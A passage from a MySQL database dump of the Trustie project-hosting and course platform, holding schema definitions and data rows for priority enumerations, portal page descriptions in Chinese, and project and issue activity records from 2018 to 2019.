KEY `index_enumerations_on_project_id` (`project_id`),
|
||
KEY `index_enumerations_on_id_and_type` (`id`,`type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `enumerations`
|
||
--
|
||
|
||
LOCK TABLES `enumerations` WRITE;
|
||
/*!40000 ALTER TABLE `enumerations` DISABLE KEYS */;
|
||
INSERT INTO `enumerations` VALUES (1,'低',1,0,'IssuePriority',1,NULL,NULL,'lowest'),(2,'正常',2,1,'IssuePriority',1,NULL,NULL,'default'),(3,'高',3,0,'IssuePriority',1,NULL,NULL,'high3'),(4,'紧急',4,0,'IssuePriority',1,NULL,NULL,'high2'),(5,'立刻',5,0,'IssuePriority',1,NULL,NULL,'highest'),(6,'User documentation',1,0,'DocumentCategory',1,NULL,NULL,NULL),(7,'Technical documentation',2,0,'DocumentCategory',1,NULL,NULL,NULL),(8,'Design',1,0,'TimeEntryActivity',1,NULL,NULL,NULL),(9,'Development',2,0,'TimeEntryActivity',1,NULL,NULL,NULL),(10,'Design',3,0,'TimeEntryActivity',0,455,8,NULL),(11,'Development',4,0,'TimeEntryActivity',0,455,9,NULL);
|
||
/*!40000 ALTER TABLE `enumerations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `experiences`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `experiences`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `experiences` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`score` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `experiences`
|
||
--
|
||
|
||
LOCK TABLES `experiences` WRITE;
|
||
/*!40000 ALTER TABLE `experiences` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `experiences` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `first_pages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `first_pages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `first_pages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`web_title` varchar(255) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`page_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`sort_type` int(11) DEFAULT NULL,
|
||
`image_width` int(11) DEFAULT '107',
|
||
`image_height` int(11) DEFAULT '63',
|
||
`show_course` int(11) DEFAULT '1',
|
||
`show_contest` int(11) DEFAULT '1',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `first_pages`
|
||
--
|
||
|
||
LOCK TABLES `first_pages` WRITE;
|
||
/*!40000 ALTER TABLE `first_pages` DISABLE KEYS */;
|
||
INSERT INTO `first_pages` VALUES (1,'Trustie - 为大学生技术创新筑巢','Trustie在线项目托管平台','面向中国大学生与软件从业者,提供社交化的项目管理、代码托管、资源共享、合作交流。','project','2018-07-02 11:22:57','2018-07-02 11:22:59',NULL,107,63,1,1),(2,'Trustie - 为大学生技术创新筑巢','Trustie在线课程实践平台','面向中国高校教师与大学生,提供社交化的课程管理、资源共享、合作实验、协同研究。','course','2018-07-02 11:22:57','2018-07-02 11:22:59',NULL,107,63,1,1),(3,'Trustie - 为大学生技术创新筑巢','Trustie在线竞赛实战平台','面向中国大学生与编程爱好者,提供社交化的竞赛管理、应用管理、代码托管、合作交流。','contest','2018-07-02 11:22:57','2018-07-02 11:22:59',NULL,107,63,1,1);
|
||
/*!40000 ALTER TABLE `first_pages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `forge_activities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `forge_activities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `forge_activities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`forge_act_id` int(11) DEFAULT NULL,
|
||
`forge_act_type` varchar(255) DEFAULT NULL,
|
||
`org_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_forge_activities_on_forge_act_id` (`forge_act_id`),
|
||
KEY `forge_act_index` (`project_id`,`forge_act_id`,`created_at`,`forge_act_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=442 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `forge_activities`
|
||
--
|
||
|
||
LOCK TABLES `forge_activities` WRITE;
|
||
/*!40000 ALTER TABLE `forge_activities` DISABLE KEYS */;
|
||
INSERT INTO `forge_activities` VALUES (1,1,1,1,'Project',NULL,'2018-07-06 18:01:47','2018-07-06 18:01:47'),(2,1,2,2,'Project',NULL,'2018-07-08 15:19:48','2018-07-08 15:19:48'),(3,1,3,3,'Project',NULL,'2018-07-18 16:50:32','2018-07-18 16:50:32'),(4,1,3,1,'Issue',NULL,'2018-07-18 16:50:44','2018-07-18 16:50:44'),(5,1,3,2,'Issue',NULL,'2018-07-19 09:48:42','2018-07-19 09:48:42'),(6,1,3,3,'Issue',NULL,'2018-07-19 09:52:33','2018-07-19 09:52:33'),(7,3,4,4,'Project',NULL,'2018-07-19 17:42:26','2018-07-19 17:42:26'),(8,3,5,5,'Project',NULL,'2018-07-19 17:42:54','2018-07-19 17:42:54'),(9,3,6,6,'Project',NULL,'2018-07-19 17:43:44','2018-07-19 17:43:44'),(10,3,7,7,'Project',NULL,'2018-07-20 08:53:02','2018-07-20 08:53:02'),(11,1,8,8,'Project',NULL,'2018-07-20 09:41:53','2018-07-20 09:41:53'),(12,5,9,9,'Project',NULL,'2018-07-20 09:59:04','2018-07-20 09:59:04'),(13,1,8,4,'Issue',NULL,'2018-07-20 10:01:50','2018-07-20 10:02:24'),(14,5,10,10,'Project',NULL,'2018-07-20 10:02:58','2018-07-20 10:02:58'),(15,1,8,5,'Issue',NULL,'2018-07-20 10:04:20','2018-08-03 17:44:41'),(16,5,11,11,'Project',NULL,'2018-07-20 10:14:48','2018-07-20 10:14:48'),(17,5,12,12,'Project',NULL,'2018-07-20 10:16:28','2018-07-20 10:16:28'),(18,5,13,13,'Project',NULL,'2018-07-20 10:17:24','2018-07-20 10:17:24'),(19,5,13,6,'Issue',NULL,'2018-07-20 10:17:47','2018-08-02 22:55:02'),(20,5,13,7,'Issue',NULL,'2018-07-20 10:18:02','2018-07-20 10:18:02'),(21,5,13,8,'Issue',NULL,'2018-07-20 10:18:18','2018-08-08 09:28:41'),(22,5,11,9,'Issue',NULL,'2018-07-20 10:19:30','2018-07-20 10:19:30'),(23,5,11,10,'Issue',NULL,'2018-07-20 10:19:50','2018-07-20 10:19:50'),(24,5,11,11,'Issue',NULL,'2018-07-20 10:21:01','2018-07-20 10:21:01'),(25,5,12,12,'Issue',NULL,'2018-07-20 10:21:31','2018-07-20 10:21:31'),(26,5,12,13,'Issue',NULL,'2018-07-20 10:22:04','2018-08-08 09:22:35'),(27,5,12,14,'Issue',NULL,'2018-07-20 10:22:24','2018-08-08 09:22:07'),(28,5,12,15,'Issue',NULL,'2018-07-20 10:22:40','2018-08-08 09:21:34'),(29,5,14,14,'Project',NULL,'2018-07-20 10:58:29','2018-07-20 10:58:29'),(30,5,15,15,'Project',NULL,'2018-07-20 11:01:45','2018-07-20 11:01:45'),(31,5,16,16,'Project',NULL,'2018-07-20 11:07:40','2018-07-20 11:07:40'),(32,5,17,17,'Project',NULL,'2018-07-20 11:15:16','2018-07-20 11:15:16'),(33,6,18,18,'Project',NULL,'2018-07-20 14:49:23','2018-07-20 14:49:23'),(35,6,18,17,'Issue',NULL,'2018-07-20 14:51:24','2018-08-03 17:11:00'),(36,5,12,18,'Issue',NULL,'2018-07-23 14:35:05','2018-07-23 14:35:05'),(39,1,18,21,'Issue',NULL,'2018-08-03 17:50:18','2018-08-03 18:49:52'),(40,6,19,19,'Project',NULL,'2018-08-03 18:32:35','2018-08-03 18:32:35'),(41,6,19,22,'Issue',NULL,'2018-08-03 18:35:14','2018-08-03 18:35:14'),(42,1,20,20,'Project',NULL,'2018-08-03 18:50:20','2018-08-03 18:50:20'),(44,1,21,21,'Project',NULL,'2018-08-03 18:51:40','2018-08-03 18:51:40'),(45,1,21,24,'Issue',NULL,'2018-08-03 18:52:08','2018-08-03 18:52:08'),(46,5,13,25,'Issue',NULL,'2018-08-08 09:29:58','2018-08-10 09:19:23'),(47,10,22,22,'Project',NULL,'2018-08-13 18:33:19','2018-08-13 18:33:19'),(48,6,23,23,'Project',NULL,'2018-08-17 11:28:50','2018-08-17 11:28:50'),(49,6,24,24,'Project',NULL,'2018-08-17 21:32:11','2018-08-17 21:32:11'),(50,1,25,25,'Project',NULL,'2018-08-21 16:25:32','2018-08-21 16:25:32'),(51,1,26,26,'Project',NULL,'2018-08-21 16:29:42','2018-08-21 16:29:42'),(52,11,27,27,'Project',NULL,'2018-08-21 17:23:05','2018-08-21 17:23:05'),(53,11,28,28,'Project',NULL,'2018-08-21 18:44:13','2018-08-21 18:44:13'),(54,11,29,29,'Project',NULL,'2018-08-21 18:46:25','2018-08-21 18:46:25'),(55,11,30,30,'Project',NULL,'2018-08-21 18:57:33','2018-08-21 18:57:33'),(56,11,31,31,'Project',NULL,'2018-08-21 20:18:25','2018-08-21 20:18:25'),(57,1,32,32,'Project',NULL,'2018-08-21 20:34:40','2018-08-21 20:34:40'),(58,11,33,33,'Project',NULL,'2018-08-21 20:48:11','2018-08-21 20:48:11'),(59,1,34,34,'Project',NULL,'2018-08-21 21:29:25','2018-08-21 21:29:25'),(60,1,35,35,'Project',NULL,'2018-08-21 21:33:54','2018-08-21 21:33:54'),(61,1,36,36,'Project',NULL,'2018-08-21 21:45:33','2018-08-21 21:45:33'),(62,1,37,37,'Project',NULL,'2018-08-21 22:12:51','2018-08-21 22:12:51'),(63,11,38,38,'Project',NULL,'2018-08-21 23:15:14','2018-08-21 23:15:14'),(64,1,39,39,'Project',NULL,'2018-08-21 23:30:47','2018-08-21 23:30:47'),(65,1,40,40,'Project',NULL,'2018-08-21 23:33:15','2018-08-21 23:33:15'),(66,11,41,41,'Project',NULL,'2018-08-21 23:38:54','2018-08-21 23:38:54'),(67,11,42,42,'Project',NULL,'2018-08-21 23:40:52','2018-08-21 23:40:52'),(68,11,43,43,'Project',NULL,'2018-08-21 23:42:57','2018-08-21 23:42:57'),(69,11,44,44,'Project',NULL,'2018-08-21 23:43:59','2018-08-21 23:43:59'),(70,11,45,45,'Project',NULL,'2018-08-21 23:44:53','2018-08-21 23:44:53'),(71,11,46,46,'Project',NULL,'2018-08-21 23:54:20','2018-08-21 23:54:20'),(72,11,47,47,'Project',NULL,'2018-08-22 09:23:50','2018-08-22 09:23:50'),(73,1,48,48,'Project',NULL,'2018-08-22 09:31:55','2018-08-22 09:31:55'),(74,1,49,49,'Project',NULL,'2018-08-22 10:56:19','2018-08-22 10:56:19'),(75,1,50,50,'Project',NULL,'2018-08-22 11:11:54','2018-08-22 11:11:54'),(76,1,51,51,'Project',NULL,'2018-08-22 15:25:12','2018-08-22 15:25:12'),(77,11,52,52,'Project',NULL,'2018-08-22 15:33:22','2018-08-22 15:33:22'),(78,1,53,53,'Project',NULL,'2018-08-22 15:37:25','2018-08-22 15:37:25'),(79,1,54,54,'Project',NULL,'2018-08-22 15:51:27','2018-08-22 15:51:27'),(80,12,55,55,'Project',NULL,'2018-08-22 16:00:19','2018-08-22 16:00:19'),(81,12,56,56,'Project',NULL,'2018-08-22 16:02:35','2018-08-22 16:02:35'),(82,1,57,57,'Project',NULL,'2018-08-22 16:07:33','2018-08-22 16:07:33'),(83,11,58,58,'Project',NULL,'2018-08-22 16:38:07','2018-08-22 16:38:07'),(84,1,59,59,'Project',NULL,'2018-08-22 16:43:41','2018-08-22 16:43:41'),(85,1,60,60,'Project',NULL,'2018-08-22 16:46:06','2018-08-22 16:46:06'),(86,1,61,61,'Project',NULL,'2018-08-22 16:47:36','2018-08-22 16:47:36'),(87,1,62,62,'Project',NULL,'2018-08-22 16:54:53','2018-08-22 16:54:53'),(88,1,63,63,'Project',NULL,'2018-08-22 16:59:13','2018-08-22 16:59:13'),(89,1,64,64,'Project',NULL,'2018-08-22 17:00:31','2018-08-22 17:00:31'),(90,1,65,65,'Project',NULL,'2018-08-22 17:02:57','2018-08-22 17:02:57'),(91,1,66,66,'Project',NULL,'2018-08-22 17:04:41','2018-08-22 17:04:41'),(92,1,67,67,'Project',NULL,'2018-08-22 17:07:57','2018-08-22 17:07:57'),(93,1,32,26,'Issue',NULL,'2018-11-14 14:54:47','2018-11-14 14:54:47'),(94,12,68,68,'Project',NULL,'2018-11-14 15:32:27','2018-11-14 15:32:27'),(95,1,69,69,'Project',NULL,'2018-11-22 20:39:28','2018-11-22 20:39:28'),(96,1,70,70,'Project',NULL,'2018-11-22 22:27:30','2018-11-22 22:27:30'),(97,1,71,71,'Project',NULL,'2018-11-22 22:31:56','2018-11-22 22:31:56'),(98,1,72,72,'Project',NULL,'2018-11-22 22:55:23','2018-11-22 22:55:23'),(99,1,73,73,'Project',NULL,'2018-11-22 23:02:24','2018-11-22 23:02:24'),(100,1,74,74,'Project',NULL,'2018-11-22 23:05:54','2018-11-22 23:05:54'),(101,1,75,75,'Project',NULL,'2018-11-22 23:13:28','2018-11-22 23:13:28'),(102,1,76,76,'Project',NULL,'2018-11-22 23:26:45','2018-11-22 23:26:45'),(103,1,76,27,'Issue',NULL,'2018-11-22 23:27:43','2018-11-22 23:27:43'),(104,1,76,28,'Issue',NULL,'2018-11-23 00:37:09','2018-11-23 00:37:09'),(105,1,76,29,'Issue',NULL,'2018-11-23 00:37:57','2018-11-23 00:37:57'),(106,1,77,77,'Project',NULL,'2018-11-23 06:49:22','2018-11-23 06:49:22'),(107,1,78,78,'Project',NULL,'2018-11-23 06:51:35','2018-11-23 06:51:35'),(108,1,79,79,'Project',NULL,'2018-11-23 10:06:14','2018-11-23 10:06:14'),(109,19,80,80,'Project',NULL,'2019-01-15 14:28:55','2019-01-15 14:28:55'),(110,19,81,81,'Project',NULL,'2019-01-15 15:05:57','2019-01-15 15:05:57'),(111,19,81,30,'Issue',NULL,'2019-01-15 15:08:31','2019-01-15 15:08:31'),(112,19,82,82,'Project',NULL,'2019-01-17 15:18:21','2019-01-17 15:18:21'),(119,1,89,89,'Project',NULL,'2019-01-17 20:33:41','2019-01-17 20:33:41'),(124,19,94,94,'Project',NULL,'2019-01-21 09:50:59','2019-01-21 09:50:59'),(125,19,94,31,'Issue',NULL,'2019-01-21 10:17:25','2019-01-21 10:18:56'),(126,1,95,95,'Project',NULL,'2019-01-21 15:33:42','2019-01-21 15:33:42'),(127,1,95,32,'Issue',NULL,'2019-01-21 15:39:03','2019-01-21 15:40:30'),(128,1,95,33,'Issue',NULL,'2019-01-21 15:43:01','2019-01-21 15:43:01'),(129,1,95,34,'Issue',NULL,'2019-01-21 15:44:48','2019-01-21 15:44:48'),(130,6,96,96,'Project',NULL,'2019-01-21 23:10:35','2019-01-21 23:10:35'),(131,6,97,97,'Project',NULL,'2019-01-21 23:21:47','2019-01-21 23:21:47'),(132,1,98,98,'Project',NULL,'2019-01-21 23:48:01','2019-01-21 23:48:01'),(133,1,99,99,'Project',NULL,'2019-01-21 23:49:37','2019-01-21 23:49:37'),(134,1,100,100,'Project',NULL,'2019-01-22 00:19:13','2019-01-22 00:19:13'),(135,1,100,35,'Issue',NULL,'2019-01-22 00:35:19','2019-01-22 00:37:36'),(136,1,100,36,'Issue',NULL,'2019-01-22 00:37:13','2019-01-22 00:37:13'),(137,1,100,37,'Issue',NULL,'2019-01-22 00:39:45','2019-01-22 00:39:45'),(138,1,100,38,'Issue',NULL,'2019-01-22 00:40:32','2019-01-22 00:57:05'),(139,1,100,39,'Issue',NULL,'2019-01-22 00:49:47','2019-01-22 00:49:47'),(140,1,95,40,'Issue',NULL,'2019-01-22 00:50:45','2019-01-22 00:50:45'),(141,1,101,101,'Project',NULL,'2019-01-22 09:06:36','2019-01-22 09:06:36'),(142,1,101,41,'Issue',NULL,'2019-01-22 09:14:03','2019-01-22 09:21:35'),(143,1,101,42,'Issue',NULL,'2019-01-22 09:19:46','2019-01-22 09:19:46'),(144,6,102,102,'Project',NULL,'2019-01-22 09:32:37','2019-01-22 09:32:37'),(145,6,103,103,'Project',NULL,'2019-01-22 09:32:38','2019-01-22 09:32:38'),(146,22,104,104,'Project',NULL,'2019-02-20 21:02:36','2019-02-20 21:02:36'),(160,6,118,118,'Project',NULL,'2019-03-04 15:44:28','2019-03-04 15:44:28'),(161,22,119,119,'Project',NULL,'2019-03-04 16:00:37','2019-03-04 16:00:37'),(162,26,120,120,'Project',NULL,'2019-03-04 16:35:36','2019-03-04 16:35:36'),(163,26,120,43,'Issue',NULL,'2019-03-05 15:49:52','2019-03-05 15:49:52'),(164,31,121,121,'Project',NULL,'2019-03-21 17:30:58','2019-03-21 17:30:58'),(165,31,122,122,'Project',NULL,'2019-03-22 10:10:29','2019-03-22 10:10:29'),(166,31,123,123,'Project',NULL,'2019-03-22 10:11:18','2019-03-22 10:11:18'),(167,41,124,124,'Project',NULL,'2019-03-22 15:04:38','2019-03-22 15:04:38'),(168,31,125,125,'Project',NULL,'2019-03-22 15:52:07','2019-03-22 15:52:07'),(169,31,126,126,'Project',NULL,'2019-03-22 16:00:35','2019-03-22 16:00:35'),(170,32,127,127,'Project',NULL,'2019-03-22 16:06:15','2019-03-22 16:06:15'),(171,31,128,128,'Project',NULL,'2019-03-22 16:08:36','2019-03-22 16:08:36'),(172,29,129,129,'Project',NULL,'2019-03-28 10:48:42','2019-03-28 10:48:42'),(173,26,130,130,'Project',NULL,'2019-04-01 11:23:26','2019-04-01 11:23:26'),(174,43,130,1,'AppliedProject',NULL,'2019-04-17 09:55:37','2019-04-17 09:55:37'),(175,43,130,44,'Issue',NULL,'2019-04-17 10:07:15','2019-04-17 17:36:14'),(176,26,130,45,'Issue',NULL,'2019-04-17 13:19:30','2019-04-18 17:13:41'),(177,26,130,46,'Issue',NULL,'2019-04-17 14:23:09','2019-04-17 14:25:35'),(178,26,130,47,'Issue',NULL,'2019-04-18 17:52:48','2019-04-18 17:57:30'),(179,6,131,131,'Project',NULL,'2019-04-28 10:06:35','2019-04-28 10:06:35'),(180,26,130,48,'Issue',NULL,'2019-04-29 11:20:03','2019-04-29 11:25:08'),(181,26,130,49,'Issue',NULL,'2019-04-29 11:30:13','2019-04-29 11:33:05'),(182,26,130,50,'Issue',NULL,'2019-04-29 11:42:44','2019-08-14 14:35:38'),(183,51,132,132,'Project',NULL,'2019-08-07 15:10:24','2019-08-07 15:10:24'),(184,46,133,133,'Project',NULL,'2019-08-07 16:27:48','2019-08-07 16:27:48'),(185,46,128,51,'Issue',NULL,'2019-08-08 08:48:02','2019-08-08 08:48:02'),(186,49,134,134,'Project',NULL,'2019-08-08 11:31:30','2019-08-08 11:31:30'),(187,49,134,52,'Issue',NULL,'2019-08-08 15:34:53','2019-08-08 15:34:53'),(188,50,134,53,'Issue',NULL,'2019-08-13 16:32:02','2019-08-13 16:32:02'),(190,46,133,54,'Issue',NULL,'2019-08-14 08:17:58','2019-08-14 08:17:58'),(191,54,135,135,'Project',NULL,'2019-08-14 16:52:04','2019-08-14 16:52:04'),(192,50,136,136,'Project',NULL,'2019-08-16 08:04:46','2019-08-16 08:04:46'),(193,50,137,137,'Project',NULL,'2019-08-16 08:09:17','2019-08-16 08:09:17'),(194,50,138,138,'Project',NULL,'2019-08-16 08:11:39','2019-08-16 08:11:39'),(195,50,139,139,'Project',NULL,'2019-08-16 08:14:51','2019-08-16 08:14:51'),(196,50,140,140,'Project',NULL,'2019-08-16 08:19:15','2019-08-16 08:19:15'),(197,50,141,141,'Project',NULL,'2019-08-16 08:23:46','2019-08-16 08:23:46'),(198,50,142,142,'Project',NULL,'2019-08-16 08:28:32','2019-08-16 08:28:32'),(199,50,143,143,'Project',NULL,'2019-08-16 08:31:31','2019-08-16 08:31:31'),(200,50,141,55,'Issue',NULL,'2019-08-16 09:24:33','2019-08-24 14:51:21'),(201,54,144,144,'Project',NULL,'2019-08-16 09:31:37','2019-08-16 09:31:37'),(202,50,144,56,'Issue',NULL,'2019-08-23 15:09:37','2019-08-23 15:09:37'),(203,50,145,145,'Project',NULL,'2019-08-23 15:26:10','2019-08-23 15:26:10'),(204,50,141,57,'Issue',NULL,'2019-09-02 08:56:25','2019-09-02 08:56:25'),(206,26,149,149,'Project',NULL,'2019-09-09 13:54:56','2019-09-09 13:54:56'),(207,50,152,152,'Project',NULL,'2019-09-19 15:42:28','2019-09-19 15:42:28'),(209,52,153,153,'Project',NULL,'2019-09-20 09:14:38','2019-09-20 09:14:38'),(211,16,154,154,'Project',NULL,'2019-09-20 15:05:01','2019-09-20 15:05:01'),(212,50,155,155,'Project',NULL,'2019-09-28 16:33:00','2019-09-28 16:33:00'),(213,50,156,156,'Project',NULL,'2019-09-29 09:10:33','2019-09-29 09:10:33'),(214,50,157,157,'Project',NULL,'2019-09-30 11:15:19','2019-09-30 11:15:19'),(215,50,158,158,'Project',NULL,'2019-09-30 11:36:22','2019-09-30 11:36:22'),(216,50,159,159,'Project',NULL,'2019-09-30 12:14:18','2019-09-30 12:14:18'),(218,20,155,59,'Issue',NULL,'2019-10-08 10:44:52','2019-10-08 10:44:52'),(219,50,160,160,'Project',NULL,'2019-10-08 10:48:57','2019-10-08 10:48:57'),(220,20,161,161,'Project',NULL,'2019-10-08 10:51:05','2019-10-08 10:51:05'),(221,20,161,60,'Issue',NULL,'2019-10-08 11:00:58','2019-10-08 11:02:36'),(222,52,162,162,'Project',NULL,'2019-10-08 11:07:00','2019-10-08 11:07:00'),(223,20,161,61,'Issue',NULL,'2019-10-08 13:47:02','2019-10-08 13:47:02'),(225,49,163,163,'Project',NULL,'2019-10-14 08:53:42','2019-10-14 08:53:42'),(226,46,164,164,'Project',NULL,'2019-10-18 11:28:39','2019-10-18 11:28:39'),(227,20,165,165,'Project',NULL,'2019-10-18 17:19:10','2019-10-18 17:19:10'),(228,50,166,166,'Project',NULL,'2019-10-19 09:19:03','2019-10-19 09:19:03'),(229,49,167,167,'Project',NULL,'2019-10-23 09:12:06','2019-10-23 09:12:06'),(230,59,168,168,'Project',NULL,'2019-10-23 09:36:23','2019-10-23 09:36:23'),(232,46,169,169,'Project',NULL,'2019-10-23 15:20:39','2019-10-23 15:20:39'),(233,46,169,62,'Issue',NULL,'2019-10-23 16:14:16','2019-10-23 16:54:49'),(234,49,169,7,'AppliedProject',NULL,'2019-10-23 16:27:47','2019-10-23 16:27:47'),(235,49,169,63,'Issue',NULL,'2019-10-23 16:45:23','2019-10-23 16:46:50'),(236,50,170,170,'Project',NULL,'2019-10-26 10:21:55','2019-10-26 10:21:55'),(237,41,127,8,'AppliedProject',NULL,'2019-10-28 15:09:08','2019-10-28 15:09:08'),(238,41,171,171,'Project',NULL,'2019-10-28 15:09:34','2019-10-28 15:09:34'),(239,46,172,172,'Project',NULL,'2019-10-29 08:34:45','2019-10-29 08:34:45'),(240,46,173,173,'Project',NULL,'2019-10-29 09:02:32','2019-10-29 09:02:32'),(241,46,174,174,'Project',NULL,'2019-10-29 14:47:32','2019-10-29 14:47:32'),(242,46,175,175,'Project',NULL,'2019-10-29 14:48:52','2019-10-29 14:48:52'),(243,46,176,176,'Project',NULL,'2019-10-29 15:15:04','2019-10-29 15:15:04'),(244,50,177,177,'Project',NULL,'2019-10-29 15:23:15','2019-10-29 15:23:15'),(245,50,178,178,'Project',NULL,'2019-10-29 15:24:34','2019-10-29 15:24:34'),(246,46,179,179,'Project',NULL,'2019-10-29 15:33:25','2019-10-29 15:33:25'),(247,46,180,180,'Project',NULL,'2019-10-29 15:36:47','2019-10-29 15:36:47'),(248,50,181,181,'Project',NULL,'2019-10-29 15:42:56','2019-10-29 15:42:56'),(249,50,182,182,'Project',NULL,'2019-10-29 15:43:00','2019-10-29 15:43:00'),(250,46,183,183,'Project',NULL,'2019-10-29 15:46:19','2019-10-29 15:46:19'),(251,46,184,184,'Project',NULL,'2019-10-29 16:01:15','2019-10-29 16:01:15'),(252,46,185,185,'Project',NULL,'2019-10-29 16:13:35','2019-10-29 16:13:35'),(253,46,178,9,'AppliedProject',NULL,'2019-10-29 16:29:20','2019-10-29 16:29:20'),(254,61,186,186,'Project',NULL,'2019-10-29 17:58:31','2019-10-29 17:58:31'),(255,49,187,187,'Project',NULL,'2019-10-31 14:49:46','2019-10-31 14:49:46'),(257,49,188,188,'Project',NULL,'2019-10-31 15:02:11','2019-10-31 15:02:11'),(259,59,189,189,'Project',NULL,'2019-10-31 15:18:45','2019-10-31 15:18:45'),(260,61,188,64,'Issue',NULL,'2019-10-31 16:54:19','2019-10-31 17:00:14'),(261,46,188,65,'Issue',NULL,'2019-10-31 16:57:23','2019-10-31 17:00:59'),(262,46,188,66,'Issue',NULL,'2019-10-31 17:02:37','2019-10-31 17:02:37'),(263,61,188,67,'Issue',NULL,'2019-10-31 17:02:39','2019-10-31 17:05:53'),(264,46,188,68,'Issue',NULL,'2019-10-31 17:04:30','2019-10-31 17:05:24'),(265,50,190,190,'Project',NULL,'2019-11-05 13:49:37','2019-11-05 13:49:37'),(267,71,191,191,'Project',NULL,'2019-11-05 17:26:42','2019-11-05 17:26:42'),(268,49,192,192,'Project',NULL,'2019-11-06 15:58:55','2019-11-06 15:58:55'),(270,59,193,193,'Project',NULL,'2019-11-06 16:36:58','2019-11-06 16:36:58'),(271,46,192,69,'Issue',NULL,'2019-11-06 16:38:25','2019-11-06 16:53:12'),(272,49,194,194,'Project',NULL,'2019-11-07 11:05:55','2019-11-07 11:05:55'),(273,49,195,195,'Project',NULL,'2019-11-07 11:07:28','2019-11-07 11:07:28'),(274,59,196,196,'Project',NULL,'2019-11-07 11:10:08','2019-11-07 11:10:08'),(276,49,194,70,'Issue',NULL,'2019-11-07 11:14:16','2019-11-07 11:14:16'),(277,49,194,71,'Issue',NULL,'2019-11-07 11:14:16','2019-11-07 11:14:16'),(278,46,194,72,'Issue',NULL,'2019-11-07 11:15:06','2019-11-07 11:15:06'),(279,49,197,197,'Project',NULL,'2019-11-07 14:44:39','2019-11-07 14:44:39'),(280,49,198,198,'Project',NULL,'2019-11-07 15:48:29','2019-11-07 15:48:29'),(281,49,199,199,'Project',NULL,'2019-11-07 15:51:07','2019-11-07 15:51:07'),(282,46,199,15,'AppliedProject',NULL,'2019-11-07 15:53:31','2019-11-07 15:53:31'),(283,46,199,73,'Issue',NULL,'2019-11-07 16:05:58','2019-11-08 14:49:04'),(284,59,200,200,'Project',NULL,'2019-11-07 16:17:51','2019-11-07 16:17:51'),(285,64,199,74,'Issue',NULL,'2019-11-07 16:21:16','2019-11-08 14:36:34'),(286,65,199,75,'Issue',NULL,'2019-11-08 10:59:33','2019-11-08 11:44:16'),(287,63,199,76,'Issue',NULL,'2019-11-08 11:10:36','2019-11-08 14:37:02'),(288,65,199,77,'Issue',NULL,'2019-11-08 11:14:43','2019-11-08 14:37:25'),(289,64,199,78,'Issue',NULL,'2019-11-08 11:15:17','2019-11-08 14:37:46'),(290,63,199,79,'Issue',NULL,'2019-11-08 11:15:37','2019-11-08 14:38:08'),(291,64,199,80,'Issue',NULL,'2019-11-08 11:15:59','2019-11-08 14:38:27'),(292,64,199,81,'Issue',NULL,'2019-11-08 11:16:33','2019-11-08 14:40:38'),(293,49,199,82,'Issue',NULL,'2019-11-08 11:16:41','2019-11-08 14:41:09'),(294,64,199,83,'Issue',NULL,'2019-11-08 11:17:09','2019-11-08 14:44:36'),(295,64,199,84,'Issue',NULL,'2019-11-08 11:17:49','2019-11-08 14:50:38'),(296,63,199,85,'Issue',NULL,'2019-11-08 11:18:06','2019-11-08 11:43:04'),(297,64,199,86,'Issue',NULL,'2019-11-08 11:18:44','2019-11-08 14:50:47'),(298,65,199,87,'Issue',NULL,'2019-11-08 11:19:24','2019-11-08 14:51:42'),(299,49,199,88,'Issue',NULL,'2019-11-08 11:21:08','2019-11-08 14:51:32'),(300,65,199,89,'Issue',NULL,'2019-11-08 11:22:20','2019-11-08 14:49:33'),(302,46,199,91,'Issue',NULL,'2019-11-08 11:27:07','2019-11-08 14:49:43'),(303,46,199,92,'Issue',NULL,'2019-11-08 11:28:56','2019-11-08 14:49:53'),(304,65,201,201,'Project',NULL,'2019-11-08 18:43:13','2019-11-08 18:43:13'),(305,66,199,93,'Issue',NULL,'2019-11-10 12:44:07','2019-11-11 08:13:41'),(306,66,199,94,'Issue',NULL,'2019-11-10 12:44:50','2019-11-11 